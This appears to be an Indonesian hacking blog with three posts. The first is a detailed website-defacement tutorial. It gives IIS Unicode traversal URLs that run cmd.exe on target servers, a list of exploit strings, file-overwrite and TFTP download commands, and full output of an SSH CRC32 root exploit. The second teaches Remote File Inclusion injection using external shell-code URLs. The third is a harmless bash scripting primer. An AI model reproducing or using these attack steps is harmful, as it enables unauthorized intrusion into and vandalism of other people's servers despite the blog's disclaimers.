Sabtu, 28 Juni 2008

Cara Deface Website

Zzzz..... *Clink* "We Come Back" (((dolby stereo))) :D pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya?? pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ? hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat ato bahkan berlipat-lipat :D. Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali kontoversi baik positif/negatif, posting kali ini bukannya ngajarin kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen berbagi pengetahuan saja ga` ada motif laen dan kita juga ga menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu awal dari kehancuran kita sendiri dan nantinya dimintai pertanggung-jawaban dari semua itu.

Aduh, koq jadi ngelantur gini ya :)) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita "Resiko Ditanggung Masing - Masing". Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :


1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah
kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:

http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "http://www.targethost.com"
· Bagian exploit string, yaitu "/scripts/..%255c..%255c"
· Bagian folder, yaitu "/winnt/system32/"
· Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian command yaitu, cmdku.exe?/c+echo+
  • ..::DeFaCinG by : aku::..Bagian HTML
  • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :
  • http://www.targethost.com/scripts/..%255c..%255c
    /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
    up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian folder, yaitu /winnt/system32/
  • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
  • Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

--------------------------------------------END--------------------------------------------------

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"

Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small - SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h - stack_buf distance
(34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0x0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0x0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0x0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0x0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0x0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya :
  1. ganti dulu nama indexnyamv index.htm oldindex.htm
  2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
  3. masukan HTML yang kalian buat di vi ataupun pico tadi
  4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!
Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehheudah dulu yah...BUBAYYYYYY!!!!!!!!!!!!
Baca Selengkapnya..

Senin, 23 Juni 2008

Mengenal Shell Exploite Inject

Hup..Hup.. Alo dekaters kali ini kami sediki berbagi lagi mengenai Shell Exploite Inject, bagi para master - master pasti sudah tidak awam dengan yang kami maksud pada posting ini, dan maaf kalo ada kesalahan dalam informasi.
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.
  • Bagaimana cara mendapatkan shell tersebut ?
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject
  • Bagaimana cara melihat bugs pada suatu script aplikasi pada website ?
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script


($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

require <--- panggilan data $docroot <--- variabel /FCDIRECTORY/fc_functions/fc_functions.php <--- directory dan file dimana ditemukan bugs (kerusakan atau kelemahan) jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut. sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?” $docroot.'/FCDIRECTORY/fc_functions/fc_functions.php

jika diputar balikan akan menjadi

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=

Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut ... ? letaknya ada pada script bugs

require

($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link http://psychophobia.co.cc/psycho? atau http://artworkmarket.com/components/rey?
nah sekarang akan kita gabungkan akan menjadi seperti

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]

contoh:

www.site.com/
[path]/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]

gunakan shell code :

http://psychophobia.co.cc/psycho?

contoh :

fc_functions.php?docroot=http://psychophobia.co.cc/psycho?

jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita .

Pusing... pusing... pusing.. , wekekekkeke.., tenang bro pada kenyataannya untuk mencarinya tidak sesulit yang kita pikirkan koq, kadang teori memang rumit tapi praktek yang kita inginkan. Kuncinya agar kita dapat melaksanakannya adalah, 1. kemauan, 2. gemar baca artikel mengenai hal tersebut, 3. sedikit tanya sana - sini, dan terutama... Prakteknya :D Happy Nice Day

Baca Selengkapnya..

Kamis, 19 Juni 2008

Apa Shell itu ...... dan Cara kerjanya ¿¿??

Hai sobat dekater`s, banyak pertanyaan dari teman - teman ketika mereka gemar berkujung ke dunia IRC, awalnya seh IRC sarana untuk cari gebetan, teman, ato bahkan musuh ?!! eit...!!! yang terakir jangan yach. Tapi seiring waktu berjalan mereka mulai tertarik dengan aksesories yang ada pada IRC seperti psyBNC dan Eggdrop ( contoh program yang in di IRC ), suatu saat ada seseorang bertanya pada kami " mas, bagaimana cara buat Bot / Eggdrop.. ?? " nah, bagaimana tuh ngejelasinnya, langkah pertama yang kami tanyakan adalah "Apakah kamu sudah memiliki shell ..?? " mereka pun balik bertanya, "Apa itu shell ..?? " nah lo...!! gimana coba jelasinnya gini ?? -.-!

Dengan banyaknya pertanyaan - pertanyaan seperti diatas tadi, kami sedikit berbagi informasi mengenai "Shell" apa itu shell ... ?? ikuti informasinya dibawah ini :

  • Pendahuluan
Apa itu shell ? shell adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

  • Macam - macam shell
Tidak seperti sistem operasi lain yang hanya menyediakan satu atau 2 shell, sistem operasi dari keluarga unix misalnya linux sampai saat ini dilengkapi oleh banyak shell dengan kumpulan perintah yang sangat banyak, sehingga memungkinkan pemakai memilih shell mana yang paling baik untuk membantu menyelesaikan pekerjaannya, atau dapat pula berpindah-pindah dari shell yang satu ke shell yang lain dengan mudah, beberapa shell yang ada di linux antara lain:
  • Bourne shell(sh),
  • C shell(csh),
  • Korn shell(ksh),
  • Bourne again shell(bash),
  • dsb.
Masing - masing shell mempunyai kelebihan dan kekurangan yang mungkin lebih didasarkan pada kebutuhan pemakai yang makin hari makin meningkat, untuk dokumentasi ini shell yang digunakan adalah bash shell dari GNU, yang merupakan pengembangan dari Bourne shell dan mengambil beberapa feature (keistimewaan) dari C shell serta Korn shell, Bash shell merupakan shell yang cukup banyak digunakan pemakai linux karena kemudahan serta banyaknya fasilitas perintah yang disediakan.versi bash shell yang saya gunakan adalah 2.04
[admin@linux$]echo $BASH_VERSION
bash 2.04.12(1)-release

Mungkin saat anda membaca dokumentasi ini versi terbaru dari bash sudah dirilis dengan penambahan feature yang lain.

  • Pemrograman Shell
Yaitu menyusun atau mengelompokkan beberapa perintah shell (internal atupun eksternal command) menjadi kumpulan perintah yang melakukan tugas tertentu sesuai tujuan penyusunnya. Kelebihan shell di linux dibanding sistem operasi lain adalah bahwa shell di linux memungkinkan kita untuk menyusun serangkaian perintah seperti halnya bahasa pemrograman (interpreter language), melakukan proses I/O, menyeleksi kondisi, looping, membuat fungsi, dsb. adalah proses - proses yang umumnya dilakukan oleh suatu bahasa pemrograman, jadi dengan shell di linux kita dapat membuat program seperti halnya bahasa pemrograman, untuk pemrograman shell pemakai unix atau linux menyebutnya sebagai script shell.

  • Kebutuhan dasar Shell
Sebelum mempelajari pemrograman Bash shell di linux sebaiknya anda telah mengetahui dan menggunakan perintah - perintah dasar shell baik itu internal command yang telah disediakan shell maupun eksternal command atau utility, seperti
  • cd, pwd, times, alias, umask, exit, logout, fg, bg, ls, mkdir, rmdir, mv, cp, rm, clear, ...
  • utilitas seperti cat, cut, paste, chmod, lpr,...
  • redirection (cara mengirim output ke file atau menerima input dari file), menggunakan operator redirect >, >>, <, <<, contohnya:ls > data
    hasil ls dikirim ke file data, jika file belum ada akan dibuat tetapi jika sudah ada isinya akan ditimpa.

    ls >> data
    hampir sama, bedanya jika file sudah ada maka isinya akan ditambah di akhir file.

    cat <>
    file data dijadikan input oleh perintah cat

  • pipa (output suatu perintah menjadi input perintah lain), operatornya : | , contoh:ls -l | sort -s
    ouput perintah ls -l (long) menjadi input perintah sort -s (urutkan secara descending), mending pake ls -l -r saja :-)

    ls -l | sort -s | more

    cat databaru

  • Wildcard dengan karakter *, ?, [ ], contohnya:ls i*
    tampilkan semua file yang dimulai dengan i

    ls i?i
    tampilkan file yang dimulai dengan i, kemudian sembarang karakter tunggal, dan diakhiri dengan i

    ls [ab]*
    tampilkan file yang dimulai dengan salah satu karakter a atau b


  • Simple bash scripts

Langkah awal sebaiknya periksa dulu shell aktif anda, gunakan perintah ps (report process status)

[admin@linux$]ps
PID TTY TIME CMD
219 tty1 00:00:00 bash
301 tty1 00:00:00 ps

bash adalah shell aktif di system saya, jika disystem anda berbeda misalnya csh atau ksh ubahlah dengan perintah change shell

[admin@linux$]chsh
Password:
New shell [/bin/csh]:/bin/bash
Shell changed

atau dengan mengetikkan bash

[admin@linux$]bash

sekarang coba anda ketikkan perintah dibawah ini pada prompt shell

echo "Script shell pertamaku di linux"

[admin@linux$]echo “Script shell pertamaku di linux”
Script shell pertamaku di linux

string yang diapit tanda kutip ganda (double quoted) akan ditampilkan pada layar anda, echo adalah statement (perintah) built-in bash yang berfungsi menampilkan informasi ke standard output yang defaultnya adalah layar. jika diinginkan mengulangi proses tersebut, anda akan mengetikkan kembali perintah tadi, tapi dengan fasilitas history cukup menggunakan tombol panah kita sudah dapat mengulangi perintah tersebut, bagaimana jika berupa kumpulan perintah yang cukup banyak, tentunya dengan fasilitas hirtory kita akan kerepotan juga mengulangi perintah yang diinginkan apalagi jika selang beberapa waktu mungkin perintah-perintah tadi sudah tertimpa oleh perintah lain karena history mempunyai kapasitas penyimpanan yang ditentukan. untuk itulah sebaiknya perintah-perintah tsb disimpan ke sebuah file yang dapat kita panggil kapanpun diinginkan.

coba ikuti langkah - langkah berikut:

  1. Masuk ke editor anda, apakah memakai vi,pico,emacs,dsb…
  2. ketikkan perintah berikut
    #!/bin/bash
    echo "Hello, apa khabar"
  3. simpan dengan nama file tes
  4. ubah permission file tes menggunakan chmod
    [admin@linux$]chmod 755 tes
  5. jalankan
    [admin@linux$]./tes

kapan saja anda mau mengeksekusinya tinggal memanggil file tes tersebut, jika diinginkan mengeset direktory kerja anda sehingga terdaftar pada search path ketikkan perintah berikut

PATH=$PATH:.

setelah itu script diatas dapat dijalankan dengan cara

[admin@linux$]tes
Hello, apa khabar

tanda #! pada /bin/bash dalam script tes adalah perintah yang diterjemahkan ke kernel linux untuk mengeksekusi path yang disertakan dalam hal ini program bash pada direktory /bin, sebenarnya tanpa mengikutkan baris tersebut anda tetap dapat mengeksekusi script bash, dengan catatan bash adalah shell aktif. atau dengan mengetikkan bash pada prompt shell.

[admin@linux$]bash tes

tentunya cara ini kurang efisien, menyertakan path program bash diawal script kemudian merubah permission file sehingga dapat anda execusi merupakan cara yang paling efisien.

Sekarang coba kita membuat script shell yang menampilkan informasi berikut:

  1. Waktu system
  2. Info tentang anda
  3. jumlah pemakai yang sedang login di system

contoh scriptnya:

#!/bin/bash
#myinfo

#membersihkan tampilan layar
clear

#menampilkan informasi
echo -n "Waktu system :"; date
echo -n "Anda :"; whoami
echo -n "Banyak pemakai :"; who | wc -l

sebelum dijalankan jangan lupa untuk merubah permission file myinfo sehingga dapat dieksekusi oleh anda

[fajar@linux$]chmod 755 myinfo
[fajar@linux$]./myinfo
Waktu system : Sat Nov 25 22:57:15 BORT 2001
Anda : admin
Banyak pemakai : 2

